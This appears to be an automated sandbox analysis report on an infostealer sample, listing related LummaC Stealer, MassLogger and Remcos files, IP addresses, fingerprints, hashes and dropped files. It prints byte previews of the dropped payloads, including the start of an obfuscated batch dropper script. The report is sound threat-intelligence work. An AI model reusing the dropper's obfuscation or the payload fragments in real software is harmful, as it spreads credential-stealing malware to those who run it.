	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	fghj.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	ModelsPreservation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	filename.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	davies.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	fghj.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	ModelsPreservation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	filename.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
CLOUDFLARENETUS	AP_FTT_GENERAL FUND_Email_AmityRegionaltNo5 - 1009684_315100_N.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.41.124
	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html	Get hash	malicious	HTMLPhisher	Browse	172.67.72.210
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	fghj.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	filename.exe	Get hash	malicious	LummaC	Browse	104.21.48.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	davies.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.64.1
	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.64.1
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.64.1
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.64.1
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 104.21.64.1
	fghj.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.64.1
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.64.1
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 104.21.64.1
	ModelsPreservation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.64.1
	filename.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.64.1

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\19152\Appliance.com	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse
	ModelsPreservation.exe	Get hash	malicious	LummaC	Browse
	SensorExpo.exe	Get hash	malicious	LummaC	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: DodSussex.exe, Detection: malicious, Browse Filename: DangerousMidlands.exe, Detection: malicious, Browse Filename: PortugalForum_nopump.exe, Detection: malicious, Browse Filename: CondosGold_nopump.exe, Detection: malicious, Browse Filename: PortugalForum_nopump.exe, Detection: malicious, Browse Filename: ModelsPreservation.exe, Detection: malicious, Browse Filename: SensorExpo.exe, Detection: malicious, Browse Filename: appFile.exe, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\19152\M

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	461250
Entropy (8bit):	7.999621902028459
Encrypted:	true
SSDEEP:	12288:8/0RpVmgKFUKPpmGpAzs9Qd+alBXfORFrCbKYvA:88FmgKpMMKXfQrCdY
MD5:	3D6D45218DAC95051441B7E09E8621B3
SHA1:	C6A507255B1C846187BCC734699C7B1555924FE6
SHA-256:	6A82008253E0CEB27673AD23527848E51F58ABB6E11666CC5CCA8A454E9DD244
SHA-512:	FBC7FA801FF84ADA49E72B342821706FC145BB2208741E264F29B1CD7172AD2B6215FE8A655FB02004483484CC0E5B57C8D4698943450EEBCCFD62756582A2FF
Malicious:	false
Preview:	...t..X...0y...O,q.@...^7dD....-....1..iqP%..p..W..7DA...Pl_W.#.]K.......%t.]..]..(.....l..,..S.......m..Q..x..N8j.b......G.G3.D#.k...{....'...G.'...-..<..W..tU...R..T.)...}.GS..S?Q=.......\|...!...c7.........E..%!.VR.V...IU..>6[&....H..9......j...5.J.h.EGW..bb.Qi..e...R .:..A).....g.8Rjl..K!...a.K.;(.;............:..K..67....6xA@..Yh.DoL......@T. .x..2@..K...Ic...sj..y2..Rom.........v..}..._d..(.}...O6A.we+..o....UZ.".......x.....m..,.v.R.............,a.v...+!h..t....l...?6@...B....{.2~w...8..0..X.AoX./".5a....O.......3i.>..NDl`..{.q.K.oH.U......(.G\...r...t..M...wa.d...8...?.IMC..q.{..+..W!...1q.c......&..+..tuo-...................q.K..p..7...BX.<...2.Q..1u~...]#.6..,.xN.....<.F....y.H.>...w._.}!.x.hn_v.h....8-.._;.g{1MY;5...q.....{3d..(.]HO.Y...KBeP....#@3m.+7I.$.t..(.>....b....&{.=.\a.@.~..2...4...P.[......d;q/..m...h.U..9...3.Ks..a.+.J..mBIg,U....u......".....e0ZeA;..T;.H:.u.'q.0..?...(..RK...v..'.^Z.R"....1..N.r.Rp.FJ7...x....Q...kK

C:\Users\user\AppData\Local\Temp\Argentina

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	36290
Entropy (8bit):	7.995068265567553
Encrypted:	true
SSDEEP:	768:bjEXfdJyqM23wKsAKSHsJCGkpqGI8cSTPfjQjnBvHeTBcSLX:MXfRp3qMWCDpqGI8cSTjcn5H6
MD5:	E1FEDE06FFA7694324BCF0012BAE9FE5
SHA1:	CBB60A4DF15D7CF7E15096B7532C060A97D894E8
SHA-256:	A1F87ACFE34EC54BC86497054BB85CBB35DAFBF9499BD39B46396DD5C7D8F47D
SHA-512:	101B8D400854EBED2622ED4C01D8AB9E3278720860B8907367FC3716D9B853DAD9F209435015E15B0F770776A167B2DF704B3163F8D0E31D73B61871F9889B3A
Malicious:	false
Preview:	hi6.ll......i.....eR..8X%j.3..AK\..utB......:.kWVCG...~....Me..'.T.T.[.~.\.\|.@J.A..r.n(_<)..9G..\...,..5`....z.n.....1CM.M.E'.X..$.....$gX1Gj+5...."X.~.mj..\|........m.c`)...f....Z....JM..i9H...O..r..O....+V .k2..>.P....=1..m.Zl.W..c.....%.z...]gq._...+....E.$],$..C]{N..y.a.R_..7..u...X.tC.....! .9.1_t...p~.z`>../X3.{.....#....E(...0\|...Y....gn+.\...),..#..o..C.........2h..>J]...i..J....P7'..#fr'S.YCy.o...0l....U....k.0K........i....O<.R....W.....U...%!..Kh.)>....!....+........?.....p..YB...XR.3C...Q.........Ii".H;.....3...2.qJ...z..y...?.....2..oXg.[.}...[V(.G...}....^.....,.{f....^.....F...-..c?..l.z..4.2FD......uW^.?..!&lL*.t.f.....?..Y...VB]..YI..Tm.........Y{.Bc'.lz...xY.q..%>c...c.N...../{.:.....X..\|..xPt..k..{B....7....ON=.9~.w./.E.'gyD.#$......+,.939{.W...T...:..fV..'..h.2.p..r..^.tvZ~T...h.o\|.\|..k......Z.~2...<.u....tP..V....w..x8....+x'.....+...9..J.e..0..T....C].8.N5.......'....w..D.-.......um..BW.(.5U.k^eb.j.a....h.,.....:V\.4..V.

C:\Users\user\AppData\Local\Temp\Brothers

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	6.528420431394248
Encrypted:	false
SSDEEP:	1536:H1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzg:HZg5PXPeiR6MKkjGWoUlJU8
MD5:	F7BE54E80D09910E992F0918DB991BB7
SHA1:	28EFD6516884DFCEC50BFCBFF371596F80BBD756
SHA-256:	849A886E92E8E3C8D73E2FAA569F7023C01A40E41C808D80BC8938A4F0CECE76
SHA-512:	B743C0AA129D7D9F606F823DD632E0AE0A8EFFA746704839E1ED410EDC343569E158FA076E6F2AC997C6B185A12044B480A02CD9F032EA95A9571FB02F16CD97
Malicious:	false
Preview:	...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u.

C:\Users\user\AppData\Local\Temp\Butt

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	92160
Entropy (8bit):	7.998077512036191
Encrypted:	true
SSDEEP:	1536:AhYI5MIRnfKSoZpTKTCbudVhi4aLhLldH6POBK8fyizA7LGrN9C1xm:A1MIxf5oZpTfbaGNLhLf6POtyizA7LGt
MD5:	973162049DDEB33CD2BA3E2E476F64B0
SHA1:	1DEAC83AB1224975F1E8572B8CBC5B21384B6044
SHA-256:	B2AC8FBE5D7CB9FAB2E3202FE9A0649DEC91C7112DF587565FAC27FBCB18A25E
SHA-512:	4FE741421804BA73E3C49DFD8449C49AAD6C0E398E320D6749B869CBF91D297C59139C0EC3977860B8A4A3BB8419166406C63704A81BB7347683BC9057522696
Malicious:	false
Preview:	qD'S....W..y@I.+k$m...s......m#9......_...Q.V..P...iI...Q..1)#.1..U....qtO.!&;.\$..Q.6sJ=8J..af..!..3..k......$.+#b.Gl..o...~.m!.a..l.Qz_E.:.32..rt.).[...0n.;..u..v..~.....-.0.wM..q.2w....9.%..+....B..)..!O..'4.....a...7R..~-..L...i...b...u,b[..e. f 0;.-LE.u.%..>..I#.....PM...m.hu.,.(.HX!....Kf.,a..fV.&....#\V..YN.K]....W.^[.....s.zM.a.....&.H.I...37h.xb.W.2 .........>....kb.....G....$.?!.Ff..R)...un/E.4V..d..A+....Q......$v=C.qR..`......8..s.X....d.......U..-Iy%.F.A....>.......v..].J.../".'].X..w'q.a..\|...O..Q.v.9[.\s..5.t..b....}?^..1en..w.....+....2..8c...BR....mh1 @d.QY.0cTD.8.}..0.....g..r......+..E..!.-......{Qb0y........"...PBPB....EM..K.8....vE.>........gUb..=........[.....<...A..=...&......7<8i1S.~....g.n"dHS.p.1.PW.g].f.GC...S....\..\..\.".Z.."...v.yH...}._..x.Bj....H#~;..:r_.I..M.z.#.k....Y....H....P$..]5.._!...4.#...Q.....d..?.:..C..Wq..x... .....(....Ah.....a'L3..gt..>.^o.C...:..c..~<.Z..$..8....:...6... ^.m.......:.....

C:\Users\user\AppData\Local\Temp\Distance

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	7.998142475205919
Encrypted:	true
SSDEEP:	1536:89x7v70Zw3HYIaPI1zOnt3OZJODhNby6p9oeJCljf1SKpDrCD3IRGlGUU56iSQFF:8/7zoI/8YJO1p9oeJmgKpDrk3VlG/kbC
MD5:	7674CBBCB2ACA7B63551861BF75F97D0
SHA1:	81ED4DA3280BF1ABC4D8E3EB9BEF10938C64D9C2
SHA-256:	E2CF3658C672C28D3A8D27F6EFEB40A497202B1C4F7AA5851D6471DBA5E2083F
SHA-512:	479CC5E44828C868BB38BC31588894AE08DF8D934DDC4AE4CFDB8E93AE864DAED74FEFA4845F644762BDC0C1E4533F3D90B5E8602D25467CDE1B40B431F53123
Malicious:	false
Preview:	...t..X...0y...O,q.@...^7dD....-....1..iqP%..p..W..7DA...Pl_W.#.]K.......%t.]..]..(.....l..,..S.......m..Q..x..N8j.b......G.G3.D#.k...{....'...G.'...-..<..W..tU...R..T.)...}.GS..S?Q=.......\|...!...c7.........E..%!.VR.V...IU..>6[&....H..9......j...5.J.h.EGW..bb.Qi..e...R .:..A).....g.8Rjl..K!...a.K.;(.;............:..K..67....6xA@..Yh.DoL......@T. .x..2@..K...Ic...sj..y2..Rom.........v..}..._d..(.}...O6A.we+..o....UZ.".......x.....m..,.v.R.............,a.v...+!h..t....l...?6@...B....{.2~w...8..0..X.AoX./".5a....O.......3i.>..NDl`..{.q.K.oH.U......(.G\...r...t..M...wa.d...8...?.IMC..q.{..+..W!...1q.c......&..+..tuo-...................q.K..p..7...BX.<...2.Q..1u~...]#.6..,.xN.....<.F....y.H.>...w._.}!.x.hn_v.h....8-.._;.g{1MY;5...q.....{3d..(.]HO.Y...KBeP....#@3m.+7I.$.t..(.>....b....&{.=.\a.@.~..2...4...P.[......d;q/..m...h.U..9...3.Ks..a.+.J..mBIg,U....u......".....e0ZeA;..T;.H:.u.'q.0..?...(..RK...v..'.^Z.R"....1..N.r.Rp.FJ7...x....Q...kK

C:\Users\user\AppData\Local\Temp\Folding

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	145408
Entropy (8bit):	6.628315928999892
Encrypted:	false
SSDEEP:	3072:h0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtv:h0nEo3tb2j6AUkB0CThp6vmVnjpv
MD5:	F7ED04C8FEBD990111B46FA11BDD8D1D
SHA1:	15D2525CEC051B85CD31F337DBE50DC4AEB8E7AB
SHA-256:	06DCA7DC1D2C82224A78FED7F59FBE4FE94776FE98FDB9D44CC66E9F4F1C2EBD
SHA-512:	15445C9E187B5B75A8A8B6256EB79571667AE4F3810A122381203E474F33A53DFC16327687F452AFDEE88E2213476F4DCF262C4A32168685F8EF761BFBFE550D
Malicious:	false
Preview:	..NY..t...,.....y.3.5\|.I.Wh.?F..u...$.....9.....u:.......t1........$..................;.t.P....Wh.?F..u..........t.P..........M..U~...M..M~.._^..[....U..E.V..Vh.?F..u..........$......... ...........\|.I.........t.P...z.......2.^]...U..M.].....U......<...SV..W3.................h.....D$<P.u.....I..D$8P.....Y..L$...t!.Y...x...D\8P..'..KY..t.G..y.L$...(...;.........,...;.......+...;.......Q.D$<P........'...............$....D$8..$...P..$H...h lL.P............$T...P...........W................]..N.Sh.....0\|...D$...ti.L$.Qh....j.Ph.....v.S..X.I..\$...t<9\|$.v6h.....D$<PS.N..\|........3.f..$<....D$<P....YY..u.3.GS.N.. \|........3.C...tkh......$D...P.u.....I...$@...P.L$,..q.........D$(;.t.P.^}.........A..A..A...L$(..\|.........$Z....t.G......C.. t..u.....I.9......7................D$.P.u.....I..D$..D$..D$..D$..D$.P.u.....I.P..x.I.........@t.......;D$.u.GC..y.......;D$.u.GC......t..D$ +D$.9.....u.GC......t..D$$+D$.9.....u.GC...t7h......$D...P.u.....I...$@...P...........YY..u.G......C...t

C:\Users\user\AppData\Local\Temp\Gently

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	102400
Entropy (8bit):	6.4059896910898395
Encrypted:	false
SSDEEP:	3072:JfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTk:JfhnvO5bLezWWt/Dd314V14ZgP0h
MD5:	304420C62ED1D9CD3F85D86582FCAC5C
SHA1:	BC0693627B10C59A1A35ABBAAC45F7286D5FB821
SHA-256:	E0ECA4D4BB96BBF101554D6C9A124607604727C3D80784CA51F17CF0DC7B79AE
SHA-512:	0C811009FA23F4E9EB9F9C8FFA81CBA3CA03ABB65D069242534C8CC29B427A3D2B72FF241FD8A41DC22ADA94BB547CD10952D49F317DF2AD55D85A4285BD9CCC
Malicious:	false
Preview:	........t$...W.u..N......L$@.F...L$P.o...L$ .D$ ..I..?....t$$.....Y_^[..]...U..E...pSV3.x..W..u....E....].E..E...I..M.].]..].]..]..E......E...H...u..M..].]..F..E..........uF.E......@.Ph.......X....M...F...M...o...M..E...I......u.........9....F.j5Y.M....].f9K..]..M.u(.u..M.;..u..M.t..E..M..0..F.....F..M.B.....jG..B....u.^f;.u........}.......t...B.Ph.....R....M.U.R...P...u....F......@.Ph.....+......E.PSV...f............E......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E..M.PSV...:...........u.S......}.......t...B.Ph................M.U.R...P.....S......F......@.Ph.........E..e......e....VPS.u..E..................E....@....f.x..t...@...Pjr._.........E....f..A.......u.M..9...E...P.E.P.E.P.E.Pj..:......M......C....td....RtQ...t3...t ...t..M..E.P....'.u..M...D...2.M..E.P.......M..E.P.AD...u..M..:.....u..M...J...E.P.M.......]..{..u...j..W:...u.M...8...E..P.E.PS......M....%C...M..%l...K.u.M..8...E...P.E.P.E.P.E.P.u..S...

C:\Users\user\AppData\Local\Temp\Highways

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	ASCII text, with very long lines (1341), with CRLF line terminators
Category:	dropped
Size (bytes):	29027
Entropy (8bit):	5.070122764281543
Encrypted:	false
SSDEEP:	384:TJN2fuMMPCstNHSrg3lVKCTzR9zCKx4BTOnuCtN5u0tmIy4E0yqK4arJKkN6OjLt:TD2zMbyEVQO9z3S6uImqvTnEKpOjLt
MD5:	1772A08E66C81359D95F1B6BE25C7BC6
SHA1:	3EC3D8D9C7AF1CB6E89D92B81761E2518844FC79
SHA-256:	1D3C3C2A3643173A621BFFE1AD7DEB6752ACF927159807CFD1C823773C133A25
SHA-512:	09B91369A720D9B5DF2F89619D29113CD12900E9057B53FA34369E43162BE4B4EF6308BD2E5B9BAB25E0666960EFA90B1C7300FF91A56CB09D07BD28D12DF06E
Malicious:	false
Preview:	Set Queries=D..sRAdventure-Gasoline-Freedom-..hETTrading-Kinda-Sunglasses-Tablets-..sSYCreates-Banners-Acc-Soft-Rule-..BCWMars-Proxy-Broadband-Gamecube-Belts-Cove-Wing-Discussions-..owMuze-Review-Ace-Experienced-Daisy-Magic-Under-Origin-Glossary-..KdThImplement-Demonstrates-Sunset-Songs-Treasurer-Evidence-Printed-Exploring-..PuOIBall-Mentioned-Settle-Hypothesis-..mjIndustry-Dutch-Zus-Obvious-Equivalent-Lasting-Particular-Young-..mRzCHot-..Set Preserve=o..tlYSherman-Chance-Mariah-Hunting-Walls-Instrument-Spell-Fragrances-Aging-..rKWelfare-Magazine-Advertisements-Just-Researcher-Designs-Km-Collective-Qc-..MYfkForms-Mesh-..yAGovt-Occasion-Hans-Enclosure-Hollow-..ZTElections-Hacker-Changed-Mar-Rc-Poll-..Set Receptors=v..AgyAmendments-Discounted-Donate-Ltd-Tubes-Calm-Fool-Compatible-..MJPens-Front-..ElJOTrend-Stephanie-Machine-Serbia-..bbNewscom-Chuck-..bSMassive-..oOWMixing-..PAWord-..NQGzip-Simon-..LWpIsrael-Funeral-Irish-Pokemon-Constantly-Much-Am-..Set Holiday=0..HXpHighlights-Looks-Bar

C:\Users\user\AppData\Local\Temp\Highways.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1341), with CRLF line terminators
Category:	dropped
Size (bytes):	29027
Entropy (8bit):	5.070122764281543
Encrypted:	false
SSDEEP:	384:TJN2fuMMPCstNHSrg3lVKCTzR9zCKx4BTOnuCtN5u0tmIy4E0yqK4arJKkN6OjLt:TD2zMbyEVQO9z3S6uImqvTnEKpOjLt
MD5:	1772A08E66C81359D95F1B6BE25C7BC6
SHA1:	3EC3D8D9C7AF1CB6E89D92B81761E2518844FC79
SHA-256:	1D3C3C2A3643173A621BFFE1AD7DEB6752ACF927159807CFD1C823773C133A25
SHA-512:	09B91369A720D9B5DF2F89619D29113CD12900E9057B53FA34369E43162BE4B4EF6308BD2E5B9BAB25E0666960EFA90B1C7300FF91A56CB09D07BD28D12DF06E
Malicious:	false
Preview:	Set Queries=D..sRAdventure-Gasoline-Freedom-..hETTrading-Kinda-Sunglasses-Tablets-..sSYCreates-Banners-Acc-Soft-Rule-..BCWMars-Proxy-Broadband-Gamecube-Belts-Cove-Wing-Discussions-..owMuze-Review-Ace-Experienced-Daisy-Magic-Under-Origin-Glossary-..KdThImplement-Demonstrates-Sunset-Songs-Treasurer-Evidence-Printed-Exploring-..PuOIBall-Mentioned-Settle-Hypothesis-..mjIndustry-Dutch-Zus-Obvious-Equivalent-Lasting-Particular-Young-..mRzCHot-..Set Preserve=o..tlYSherman-Chance-Mariah-Hunting-Walls-Instrument-Spell-Fragrances-Aging-..rKWelfare-Magazine-Advertisements-Just-Researcher-Designs-Km-Collective-Qc-..MYfkForms-Mesh-..yAGovt-Occasion-Hans-Enclosure-Hollow-..ZTElections-Hacker-Changed-Mar-Rc-Poll-..Set Receptors=v..AgyAmendments-Discounted-Donate-Ltd-Tubes-Calm-Fool-Compatible-..MJPens-Front-..ElJOTrend-Stephanie-Machine-Serbia-..bbNewscom-Chuck-..bSMassive-..oOWMixing-..PAWord-..NQGzip-Simon-..LWpIsrael-Funeral-Irish-Pokemon-Constantly-Much-Am-..Set Holiday=0..HXpHighlights-Looks-Bar

C:\Users\user\AppData\Local\Temp\Islam

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	7.997927415486124
Encrypted:	true
SSDEEP:	1536:ZTRPM9AmDGFg/v98FARN//qoino/CTwIqH3ecBfq/JtN:LJFFgtPRN/ziUCTwI03DBfMJj
MD5:	C0717EAA23E1B4D8EF42EA9E99B89B69
SHA1:	7E6B3B073737732C572642ED689C241D6D8BC077
SHA-256:	BDBE1D6E61B0115D697B5AA9E80D25B453E7474E4E09E559A1832D2DCFDC8FD1
SHA-512:	1E75297CFB2E648859B35C4562B0D95C55DAF9BA8E4A66AF13565A1BEBB646A67C680A1E1AC84B1F69F852B64B0F9D736802273B83DF7DDEA55DE19C709A7A31
Malicious:	false
Preview:	};g....5t....A..q,}..~.SR..7u.$..KR...%.@.....rT..).u.!al.fW,...lj.').t......4.d`.pw$.Lg.\|`.9.......k...]''.Z3."5y_...d...gc....wc^.nr8H.Jk!R_R.D.m`....~....D.).4..L../.w..\....q>.5..n.L....{.K....o%.iP.U.L....q...!F6.51...z.-..8.{...S.o.......1@Y....r....xc....f...o..t.D...)..ms....a}.."rO.SEs..RY..R/...C^y.F+..xn.<.U......S]...bX\..=..9.l..k{../j.../..g.2.ln~ )C.......S{... N5./Qx.%.cq...e.{m.8~hK0.......:..S.-...u,+(..ULg.q....`......%...o....$..k.J.........h-.....T.....fQ.;.^.........z.Q'.X.,.)\..!..`.G....'.l..iz.._....HR.+.U..Y?.X.NQ...0.lt.E.AQ..k.........h.{.5...@{.%S.Ty.....8(3.-...UT:.?..$.B...s......E..\!.O..).4k.F......4..@t]d..!..B.<.....2...E..f?...$..*.WQ...=..!...b3:..........7....h.Q')3..7\|.~.piic..=...y......=...o..q..........G#Y+nW..P....3.F.....r...JwJ.J.W.....u:i.5.l.......g...D.;.....r.......3F.f&..L.5....t.Z"... .,....3.%...)QG.2.......$e.l.c5d3...Q.t........6......{..#.ln.).P.%.<..._q......W....\.

C:\Users\user\AppData\Local\Temp\July

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	7.996970735141732
Encrypted:	true
SSDEEP:	1536:hKHe6Tk8avhcplFAdcv85JGTpua0urdeJ1QwBUwweBg:hKHzk8FplF7c6p10+yWRn
MD5:	99FA6F1A532385C89E16FEF6F954914E
SHA1:	6769F770470DF82AD78B32EC1535C345F28FE59C
SHA-256:	0C52ACA520B6875005651503A4D6F2B37430A227E9D84FDA93252D2AA094705C
SHA-512:	11B81B984A43C03AD5EEE5167DA72D5581D159EA7A3FAFE2BD442BB697915F3D598AC52BE0A843755D2AFF22DFBDA580CCAE455BBEA879E64475B61E24675DB2
Malicious:	false
Preview:	....I.z.-[^.bG.........=.0..O..n.H<.,6..T..c.'.h..c..!.@..#..'m0..\|..c.q.Z5..iTy.T51..O..5...@.....BKH.).zrq\...($.VQ....;.)>.\ha....wt..XW..Y6.{..9.M=.'tn......0\|hVV.;......4a..U....A/....~.g..v...e....-..Q.h@..."..h....q.Lg+>#y..A..T..8....B.m7>7Ntyg./Q.Q.^.../SB...Y.....XX0.[....[..g....un.Gv!P.M...3...eZ$...j.m..Vj7...]c.L..%m\|...b..n..U...Y..[..f..S.....\|lA....&...nw~.sx.T....{4....[.6...V.B........H...i\|..y.<.y..`.\...c..nQ....n..kI.g4X3f..#4...0..v`L.9.....PG.....<.5.p.U..T.d.....Y.xb.8..H....1../.%.A.f&..h^3.7!wjx..f.Di..bt..Jo......\..D......%..fL$.i.3s"..Z2v.L..9:........7,...j..{.L.N.............;. .Z.3j..........r.f$......a..l..Zg-.....:.x/..A3.....R?...@ e........Ni......3........p....\|.iv.........T.f.....{n.......j.....5H6..../...8(.g.....<.tq..a]a.......=.......7...Q.Ce.ex}..u.......V.......KP.A>......n.HZp.SG.Z.z.)[-..........C./3..;...$..j^...%......1.kC....Ra...~#.[.....R.(...C...."U.I..4.YD.)*...O.a2.Y..W...

C:\Users\user\AppData\Local\Temp\June

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	6.684735459735519
Encrypted:	false
SSDEEP:	1536:+eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8q0c:+eOyKODOSpQSAU4CE0c
MD5:	91CB734D0460BA18254E8FF059D6374F
SHA1:	A7A4053A9C934F5023908F1B83A2A20A137D6C16
SHA-256:	AEB2BE9B4E40055826B3F960C271F86E647A92C1DB662ED8ADF9654ED37C9E82
SHA-512:	3F5C265F4F651780889A82F5EA08D69E1BA0B22C7D2AEC865BFECD456E791744B2D3F21168B6E359B0620ED6DF0845813546F702F71CAE7118AB12C305350113
Malicious:	false
